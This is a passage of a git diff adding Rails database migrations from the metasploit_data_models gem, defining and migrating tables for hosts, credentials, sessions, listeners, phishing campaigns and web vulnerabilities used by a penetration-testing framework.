'ssh_key' + pass = note.data[:extra] + else + ptype = 'password' + pass = note.data[:pass] + end + # Format domains and databases into the usernames. + if note.ntype == "auth.smb_challenge" + domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1] + if domain + user = [domain, note.data[:user]].join("/") + else + user = note.data[:user] + end + elsif note.ntype =~ /auth\.(postgres|db2)/ + if note.data[:database] + user = [note.data[:database], note.data[:user]].join("/") + else + user = note.data[:user] + end + else + user = note.data[:user] + end + # Not actually a credentials, convert to migrated notes + if service_name == 'smb' && note.data[:token] + skipped_notes << note + next + end + if service_name == 'tns' && note.data[:type] == "bruteforced_sid" + skipped_notes << note + next + end + # Special case for the bizarre reporting for aux/admin/oracle/oracle_login + if service_name == 'tns' && note.data[:type] == "bruteforced_account" + note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/ + user = "#{$3}/#{$1}" + pass = $2 + end + new_creds << [svc_id, ptype, user, pass] + end + + say "Migrating #{new_creds.size} credentials." + new_creds.uniq.each do |note| + Mdm::Cred.new do |cred| + cred.service_id = note[0] + cred.user = note[2] + cred.pass = note[3] + cred.ptype = note[1] + cred.save! + end + end + + say "Migrating #{skipped_notes.size} notes." + skipped_notes.uniq.each do |note| + Mdm::Note.new do |new_note| + new_note.host_id = note.host_id + new_note.ntype = "migrated_auth" + new_note.data = note.data.merge(:migrated_auth_type => note.ntype) + new_note.save! + end + end + + say "Deleting migrated auth notes." + Mdm::Note.find(:all).each do |note| + next unless note.ntype[/^auth\.(.*)/] + note.delete + end + rescue + say "There was a problem migrating auth credentials. Skipping." + return true # Never fail! + end + end + + + def self.down + raise ActiveRecord::IrreversibleMigration + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb new file mode 100755 index 0000000000..b7897d3832 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb @@ -0,0 +1,16 @@ +class AddExploitedTable < ActiveRecord::Migration + def self.up + create_table :exploited_hosts do |t| + t.integer :host_id, :null => false + t.integer :service_id + t.string :session_uuid, :limit => 8 + t.string :name, :limit => 2048 + t.string :payload, :limit => 2048 + t.timestamps + end + end + def self.down + drop_table :exploited_hosts + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb new file mode 100755 index 0000000000..c136d4b9d7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb @@ -0,0 +1,9 @@ +class AddOwnerToWorkspaces < ActiveRecord::Migration + def self.up + add_column :workspaces, :owner_id, :integer + end + + def self.down + remove_column :workspaces, :owner_id + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb new file mode 100755 index 0000000000..08b06d4c5f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb @@ -0,0 +1,18 @@ +class AddReportTemplates < ActiveRecord::Migration + + def self.up + create_table :report_templates do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :path, :limit => 1024 + t.text :name + t.timestamps + end + end + + def self.down + drop_table :reports + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb new file mode 100755 index 0000000000..d73e18425d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb @@ -0,0 +1,15 @@ +class RequireAdminFlag < ActiveRecord::Migration + + # Make the admin flag required. + def self.up + # update any existing records + Mdm::User.update_all({:admin => true}, {:admin => nil}) + + change_column :users, :admin, :boolean, :null => false, :default => true + end + + def self.down + change_column :users, :admin, :boolean, :default => true + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb new file mode 100755 index 0000000000..433bdcf65f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb @@ -0,0 +1,61 @@ + +class AddCampaignsAndTemplates < ActiveRecord::Migration + + def self.up + create_table :campaigns do |t| + t.integer :workspace_id, :null => false + t.string :name, :limit => 512 + # Serialized, stores SMTP/other protocol config options etc. + t.text :prefs + t.integer :status, :default => 0 + t.timestamp :started_at + t.timestamps + end + + create_table :email_templates do |t| + t.string :name, :limit => 512 + t.string :subject, :limit => 1024 + t.text :body + t.integer :parent_id + t.integer :campaign_id + end + create_table :attachments do |t| + t.string :name, :limit => 512 + t.binary :data + t.string :content_type, :limit => 512 + t.boolean :inline, :null => false, :default => true + t.boolean :zip, :null => false, :default => false + end + create_table :attachments_email_templates, :id => false do |t| + t.integer :attachment_id + t.integer :email_template_id + end + + create_table :email_addresses do |t| + t.integer :campaign_id, :null => false + t.string :first_name, :limit => 512 + t.string :last_name, :limit => 512 + t.string :address, :limit => 512 + t.boolean :sent, :null => false, :default => false + t.timestamp :clicked_at + end + + create_table :web_templates do |t| + t.string :name, :limit => 512 + t.string :title, :limit => 512 + t.string :body, :limit => 524288 + t.integer :campaign_id + end + end + + def self.down + drop_table :campaigns + drop_table :email_templates + drop_table :attachments + drop_table :attachments_email_templates + drop_table :email_addresses + drop_table :web_templates + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb new file mode 100755 index 0000000000..7b055b268f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb @@ -0,0 +1,8 @@ +class AddGenerateExeColumn < ActiveRecord::Migration + def self.up + add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false + end + def self.down + remove_column :email_templates, :generate_exe + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb new file mode 100755 index 0000000000..70b84d0734 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb @@ -0,0 +1,11 @@ +class AddTemplatePrefs < ActiveRecord::Migration + def self.up + remove_column :email_templates, :generate_exe + add_column :email_templates, :prefs, :text + add_column :web_templates, :prefs, :text + end + def self.down + remove_column :email_templates, :prefs + remove_column :web_templates, :prefs + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb new file mode 100755 index 0000000000..e55bf286b5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb @@ -0,0 +1,57 @@ +class AddWebTables < ActiveRecord::Migration + + def self.up + create_table :web_sites do |t| + t.integer :service_id, :null => false + t.timestamps + t.string :vhost, :limit => 2048 + t.text :comments + t.text :options + end + + create_table :web_pages do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.text :query + t.integer :code, :null => false + t.text :cookie + t.text :auth + t.text :ctype + t.timestamp :mtime + t.text :location + t.text :body + t.text :headers + end + + create_table :web_forms do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.string :method, :limit => 1024 + t.text :params + end + + create_table :web_vulns do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.string :method, :limit => 1024 + t.text :params + t.text :pname + t.text :proof + t.integer :risk + t.string :name, :limit => 1024 + end + + end + + def self.down + drop_table :web_sites + drop_table :web_pages + drop_table :web_forms + drop_table :web_vulns + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb new file mode 100755 index 0000000000..f22d0f2954 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb @@ -0,0 +1,10 @@ +class AddQuery < ActiveRecord::Migration + def self.up + add_column :web_forms, :query, :text + add_column :web_vulns, :query, :text + end + def self.down + remove_column :web_forms, :query + remove_column :web_vulns, :query + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb new file mode 100755 index 0000000000..34c1eb3fd9 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb @@ -0,0 +1,15 @@ +class AddVulnInfo < ActiveRecord::Migration + def self.up + add_column :web_vulns, :category, :text + add_column :web_vulns, :confidence, :text + add_column :web_vulns, :description, :text + add_column :web_vulns, :blame, :text + end + def self.down + remove_column :web_forms, :category + remove_column :web_vulns, :confidence + remove_column :web_vulns, :description + remove_column :web_vulns, :blame + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb new file mode 100755 index 0000000000..6281f91343 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb @@ -0,0 +1,10 @@ + +class AddClientsToCampaigns < ActiveRecord::Migration + def self.up + add_column :clients, :campaign_id, :integer + end + + def self.down + remove_column :clients, :campaign_id + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb new file mode 100755 index 0000000000..6baf770f29 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb @@ -0,0 +1,15 @@ + + +class AddCampaignAttachments < ActiveRecord::Migration + + def self.up + add_column :attachments, :campaign_id, :integer + end + + def self.down + remove_column :attachments, :campaign_id + end + +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb new file mode 100755 index 0000000000..92eb12d474 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb @@ -0,0 +1,17 @@ +class AddImportedCreds < ActiveRecord::Migration + + def self.up + create_table :imported_creds do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :user, :limit => 512 + t.string :pass, :limit => 512 + t.string :ptype, :limit => 16, :default => "password" + end + end + + def self.down + drop_table :imported_creds + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb new file mode 100755 index 0000000000..2056369ed7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb @@ -0,0 +1,34 @@ +class FixWebTables < ActiveRecord::Migration + + def self.up + change_column :web_pages, :path, :text + change_column :web_pages, :query, :text + change_column :web_pages, :cookie, :text + change_column :web_pages, :auth, :text + change_column :web_pages, :ctype, :text + change_column :web_pages, :location, :text + change_column :web_pages, :path, :text + change_column :web_vulns, :path, :text + change_column :web_vulns, :pname, :text + + add_column :web_pages, :request, :text + add_column :web_vulns, :request, :text + end + + def self.down + change_column :web_pages, :path, :text + change_column :web_pages, :query, :text + change_column :web_pages, :cookie, :text + change_column :web_pages, :auth, :text + change_column :web_pages, :ctype, :text + change_column :web_pages, :location, :text + change_column :web_pages, :path, :text + change_column :web_vulns, :path, :text + change_column :web_vulns, :pname, :text + + remove_column :web_pages, :request + remove_column :web_vulns, :request + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb new file mode 100755 index 0000000000..1a0bc1bc51 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb @@ -0,0 +1,12 @@ +class ExpandHostComment < ActiveRecord::Migration + + def self.up + change_column :hosts, :comments, :text + end + + def self.down + change_column :hosts, :comments, :string, :limit => 4096 + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb new file mode 100755 index 0000000000..7365e14f9d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb @@ -0,0 +1,9 @@ +class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration + def self.up + add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false + end + + def self.down + remove_column :workspaces, :limit_to_network + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb new file mode 100755 index 0000000000..f41bc6a813 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb @@ -0,0 +1,9 @@ +class AddModuleUuidToTasks < ActiveRecord::Migration + def self.up + add_column :tasks, :module_uuid, :string, :limit => 8 + end + + def self.down + remove_column :tasks, :module_uuid + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb new file mode 100755 index 0000000000..d07c885c35 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb @@ -0,0 +1,28 @@ +class AddHostTags < ActiveRecord::Migration + + def self.up + + create_table :tags do |t| + t.integer :user_id + t.string :name, :limit => 1024 + t.text :desc + t.boolean :report_summary, :null => false, :default => false + t.boolean :report_detail, :null => false, :default => false + t.boolean :critical, :null => false, :default => false + t.timestamps + end + + create_table :hosts_tags, :id => false do |t| + t.integer :host_id + t.integer :tag_id + end + + end + + def self.down + drop_table :hosts_tags + drop_table :tags + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb new file mode 100755 index 0000000000..15ac8852bb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb @@ -0,0 +1,110 @@ +class AddSessionTable < ActiveRecord::Migration + + class Event < ActiveRecord::Base + serialize :info + end + + class SessionEvent < ActiveRecord::Base + belongs_to :session + end + + class Session < ActiveRecord::Base + has_many :events, :class_name => 'AddSessionTable::SessionEvent' + serialize :datastore + end + + def self.up + + create_table :sessions do |t| + t.integer :host_id + + t.string :stype # session type: meterpreter, shell, etc + t.string :via_exploit # module name + t.string :via_payload # payload name + t.string :desc # session description + t.integer :port + t.string :platform # platform type of the remote system + t.string :routes + + t.text :datastore # module's datastore + + t.timestamp :opened_at, :null => false + t.timestamp :closed_at + + t.string :close_reason + end + + create_table :session_events do |t| + t.integer :session_id + + t.string :etype # event type: command, output, upload, download, filedelete + t.binary :command + t.binary :output + t.string :remote_path + t.string :local_path + + t.timestamp :created_at + end + + # + # Migrate session data from events table + # + + close_events = Event.find_all_by_name("session_close") + open_events = Event.find_all_by_name("session_open") + + command_events = Event.find_all_by_name("session_command") + output_events = Event.find_all_by_name("session_output") + upload_events = Event.find_all_by_name("session_upload") + download_events = Event.find_all_by_name("session_download") + + open_events.each do |o| + c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] } + + s = Session.new( + :host_id => o.host_id, + :stype => o.info[:session_type], + :via_exploit => o.info[:via_exploit], + :via_payload => o.info[:via_payload], + :datastore => o.info[:datastore], + :opened_at => o.created_at + ) + + if c + s.closed_at = c.created_at + s.desc = c.info[:session_info] + else + # couldn't find the corresponding close event + s.closed_at = s.opened_at + s.desc = "?" + end + + uuid = o.info[:session_uuid] + + command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] ) + end + + output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] ) + end + + upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) + end + + download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) + end + + s.events.sort_by(&:created_at) + + s.save! + end + end + + def self.down + drop_table :sessions + drop_table :session_events + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb new file mode 100755 index 0000000000..7c0e57c505 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb @@ -0,0 +1,11 @@ +class AddLocalIdToSessionTable < ActiveRecord::Migration + + def self.up + add_column :sessions, :local_id, :integer + end + + def self.down + remove_column :sessions, :local_id + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb new file mode 100755 index 0000000000..1eb104f9bf --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb @@ -0,0 +1,18 @@ +class AddRoutesTable < ActiveRecord::Migration + + def self.up + create_table :routes do |t| + t.integer :session_id + t.string :subnet + t.string :netmask + end + + remove_column :sessions, :routes + end + + def self.down + drop_table :routes + + add_column :sessions, :routes, :string + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb new file mode 100755 index 0000000000..4fa3428ad1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb @@ -0,0 +1,72 @@ +class ConvertBinary < ActiveRecord::Migration + + + class WebPage < ActiveRecord::Base + serialize :headers + end + + class WebVuln < ActiveRecord::Base + serialize :params + end + + def bfilter(str) + str = str.to_s + str.encoding = 'binary' if str.respond_to?('encoding=') + str.gsub(/[\x00\x7f-\xff]/, '') + end + + def self.up + rename_column :web_pages, :body, :body_text + rename_column :web_pages, :request, :request_text + rename_column :web_vulns, :request, :request_text + rename_column :web_vulns, :proof, :proof_text + + add_column :web_pages, :body, :binary + add_column :web_pages, :request, :binary + add_column :web_vulns, :request, :binary + add_column :web_vulns, :proof, :binary + + WebPage.find(:all).each { |r| r.body = r.body_text; r.save! } + WebPage.find(:all).each { |r| r.request = r.request_text; r.save! } + WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! } + WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! } + + remove_column :web_pages, :body_text + remove_column :web_pages, :request_text + remove_column :web_vulns, :request_text + remove_column :web_vulns, :proof_text + + WebPage.connection.schema_cache.clear! + WebPage.reset_column_information + WebVuln.connection.schema_cache.clear! + WebVuln.reset_column_information + end + + def self.down + + rename_column :web_pages, :body, :body_binary + rename_column :web_pages, :request, :request_binary + rename_column :web_vulns, :request, :request_binary + rename_column :web_vulns, :proof, :proof_binary + + add_column :web_pages, :body, :text + add_column :web_pages, :request, :text + add_column :web_vulns, :request, :text + add_column :web_vulns, :proof, :text + + WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! } + WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } + WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! } + WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } + + remove_column :web_pages, :body_binary + remove_column :web_pages, :request_binary + remove_column :web_vulns, :request_binary + remove_column :web_vulns, :proof_binary + + WebPage.connection.schema_cache.clear! + WebPage.reset_column_information + WebVuln.connection.schema_cache.clear! + WebVuln.reset_column_information + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb new file mode 100755 index 0000000000..48380af6ae --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb @@ -0,0 +1,8 @@ +class AddLastSeenToSessions < ActiveRecord::Migration + def self.up + add_column :sessions, :last_seen, :timestamp + end + def self.down + remove_column :sessions, :last_seen + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb new file mode 100755 index 0000000000..7c55105fe8 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb @@ -0,0 +1,31 @@ +class TrackSuccessfulExploits < ActiveRecord::Migration + + + class ExploitedHost < ActiveRecord::Base + end + + class Vuln < ActiveRecord::Base + end + + def self.up + add_column :vulns, :exploited_at, :timestamp + + # Migrate existing exploited_hosts entries + + ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host| + next unless(exploited_host.name =~ /^(exploit|auxiliary)\//) + vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id) + next if vulns.empty? + vulns.each do |vuln| + vuln.exploited_at = exploited_host.updated_at + vuln.save + end + end + + end + + def self.down + remove_column :vulns, :exploited_at + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb new file mode 100755 index 0000000000..e1b8955b7f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb @@ -0,0 +1,26 @@ +class RenameAndPruneNessusVulns < ActiveRecord::Migration + + class Vuln < ActiveRecord::Base + end + + # No table changes, just vuln renaming to drop the NSS id + # from those vulns that have it and a descriptive name. + def self.up + Vuln.find(:all).each do |v| + if v.name =~ /^NSS-0?\s*$/ + v.delete + next + end + next unless(v.name =~ /^NSS-[0-9]+\s(.+)/) + new_name = $1 + next if(new_name.nil? || new_name.strip.empty?) + v.name = new_name + v.save! + end + end + + def self.down + say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800." + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb new file mode 100755 index 0000000000..5af2d46704 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb @@ -0,0 +1,11 @@ +class AddTaskIdToReportsTable < ActiveRecord::Migration + + def self.up + add_column :reports, :task_id, :integer + end + + def self.down + remove_column :reports, :task_id + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb new file mode 100755 index 0000000000..13e6ecedd0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb @@ -0,0 +1,12 @@ +class AddApiKeysTable < ActiveRecord::Migration + def self.up + create_table :api_keys do |t| + t.text :token + t.timestamps + end + end + def self.down + drop_table :api_keys + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb new file mode 100755 index 0000000000..bfb8ef6085 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb @@ -0,0 +1,16 @@ +class AddMacrosTable < ActiveRecord::Migration + def self.up + create_table :macros do |t| + t.timestamps + t.text :owner + t.text :name + t.text :description + t.binary :actions + t.binary :prefs + end + end + def self.down + drop_table :macros + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb new file mode 100755 index 0000000000..ee9ee21070 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb @@ -0,0 +1,12 @@ +class AddSettingsToTasksTable < ActiveRecord::Migration + + def self.up + add_column :tasks, :settings, :binary + end + + def self.down + remove_column :tasks, :settings + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb new file mode 100755 index 0000000000..c541be2131 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb @@ -0,0 +1,19 @@ +class AddListenersTable < ActiveRecord::Migration + def self.up + create_table :listeners do |t| + t.timestamps + t.integer :workspace_id, :null => false, :default => 1 + t.integer :task_id + t.boolean :enabled, :default => true + t.text :owner + t.text :payload + t.text :address + t.integer :port + t.binary :options + end + end + def self.down + drop_table :listeners + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb new file mode 100755 index 0000000000..283d102105 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb @@ -0,0 +1,12 @@ +class AddMacroToListenersTable < ActiveRecord::Migration + + def self.up + add_column :listeners, :macro, :text + end + + def self.down + remove_column :listeners, :macro + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb 